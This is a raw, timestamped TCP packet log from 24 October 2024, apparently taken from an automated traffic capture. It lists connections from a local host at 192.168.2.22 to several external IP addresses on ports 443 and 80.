                                                                                    Oct 24, 2024 08:45:41.204577923 CEST44349168216.58.212.174192.168.2.22
                                                                                    Oct 24, 2024 08:45:41.325195074 CEST44349168216.58.212.174192.168.2.22
                                                                                    Oct 24, 2024 08:45:41.325262070 CEST49168443192.168.2.22216.58.212.174
                                                                                    Oct 24, 2024 08:45:41.524539948 CEST49168443192.168.2.22216.58.212.174
                                                                                    Oct 24, 2024 08:45:41.544941902 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:41.545048952 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:41.545128107 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:41.545631886 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:41.545654058 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:42.162540913 CEST49170443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:42.162609100 CEST443491705.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:42.164061069 CEST49170443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:42.164350033 CEST49170443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:42.164366961 CEST443491705.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:42.409828901 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:42.409929037 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:42.414300919 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:42.414320946 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:42.414711952 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:42.417751074 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:42.463327885 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:43.286742926 CEST443491705.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:43.286839008 CEST49170443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:43.288336039 CEST49170443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:43.288345098 CEST443491705.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:43.293258905 CEST49170443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:43.293344021 CEST443491705.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:43.546228886 CEST443491705.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:43.546327114 CEST49170443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:43.546350956 CEST443491705.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:43.546394110 CEST443491705.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:43.546430111 CEST49170443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:43.547032118 CEST49170443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:43.547053099 CEST443491705.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:44.099761963 CEST4916780192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:44.374330997 CEST4917180192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:44.379918098 CEST8049171192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:44.379988909 CEST4917180192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:44.426356077 CEST49172443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:44.426397085 CEST443491725.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:44.426446915 CEST49172443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:44.427596092 CEST49173443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:44.427632093 CEST443491735.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:44.427676916 CEST49173443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:44.445066929 CEST49173443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:44.445082903 CEST443491735.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:44.445372105 CEST49172443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:44.445390940 CEST443491725.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.035286903 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.035387039 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.043272972 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.043349981 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.152158976 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.152232885 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.152251959 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.152261972 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.152317047 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.152364016 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.154807091 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.154861927 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.154906988 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.159111977 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.159174919 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.159197092 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.167992115 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.168040991 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.168061972 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.176594019 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.176660061 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.176678896 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.185101986 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.185163021 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.185178041 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.193960905 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.194019079 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.194026947 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.202497959 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.202553034 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.202560902 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.211258888 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.211318016 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.211323023 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.269088030 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.269126892 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.269155979 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.269160032 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.269181967 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.269198895 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.269218922 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.269248962 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.269262075 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.269267082 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.269301891 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.269848108 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.271472931 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.271502972 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.271528959 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.271534920 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.271539927 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.271578074 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.275778055 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.277431011 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.277482986 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.277488947 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.284476042 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.284499884 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.284533024 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.284538031 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.284576893 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.289247036 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.294847012 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.294899940 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.294904947 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.300628901 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.300657034 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.300688982 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.300694942 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.300736904 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.306344986 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.310106039 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.310125113 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.310180902 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.311912060 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.317570925 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.317610025 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.317619085 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.317632914 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.317670107 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.323261023 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.328974962 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.329001904 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.329029083 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.329035997 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.329070091 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.334738016 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.340266943 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.340300083 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.340315104 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.340321064 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.340466022 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.345971107 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.385823011 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.385871887 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.385893106 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.385911942 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.385943890 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.385957956 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.385963917 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.386002064 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.386008024 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.386352062 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.386387110 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.386399031 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.386404037 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.386441946 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.386962891 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.387069941 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.387098074 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.387114048 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.387120008 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.387154102 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.387844086 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.389790058 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.389839888 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.389853954 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.395005941 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.395040989 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.395098925 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.395112991 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.399775028 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.399823904 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.399830103 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.404710054 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.404753923 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.404762030 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.407881021 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.407928944 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.407933950 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.411089897 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.411137104 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.411143064 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.413814068 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.413866043 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.413872004 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.417016029 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.417064905 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.417071104 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.419774055 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.419831991 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.419836998 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.422846079 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.422897100 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.422903061 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.425654888 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.425709009 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.425714970 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.428569078 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.428618908 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.428631067 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.431442022 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.431482077 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.431495905 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.434206009 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.434263945 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.434276104 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.437014103 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.437072039 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.437077999 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.439807892 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.439848900 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.439856052 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.442585945 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.442627907 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.442634106 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.445302963 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.445342064 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.445348024 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.448180914 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.448229074 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.448235035 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.450737953 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.450788975 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.450793982 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.453463078 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.453514099 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.453517914 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.456043959 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.456096888 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.456101894 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.458559990 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.458605051 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.458611012 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.462858915 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.462908030 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.462913990 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.502624035 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.502681971 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.502702951 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.502794027 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.502835989 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.502841949 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.503030062 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.503070116 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.503074884 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.503391981 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.503421068 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.503436089 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.503444910 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.503479958 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.503490925 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.504084110 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.504115105 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.504126072 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.504132032 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.504163027 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.504168034 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.506834984 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.506885052 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.506896973 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.511766911 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.511816978 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.511831999 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.516758919 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.516805887 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.516807079 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.516822100 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.516866922 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.516874075 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.521707058 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.521760941 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.521775007 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.524983883 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.525029898 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.525043964 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.528373003 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.528417110 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.528429985 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.531356096 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.531399012 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.531411886 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.533797026 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.533845901 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.533858061 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.536724091 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.536777020 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.536789894 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.539623022 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.539668083 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.539680004 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.542568922 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.542610884 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.542622089 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.545483112 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.545528889 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.545541048 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.548321009 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.548363924 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.548368931 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.548382044 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.548415899 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.551057100 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.551151991 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.551189899 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.551201105 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.554080963 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.554133892 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.554148912 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.556895018 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.556941032 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.556955099 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.559519053 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.559571981 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.559585094 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.562299967 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.562346935 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.562352896 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.565126896 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.565268040 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.565290928 CEST44349169142.250.186.97192.168.2.22
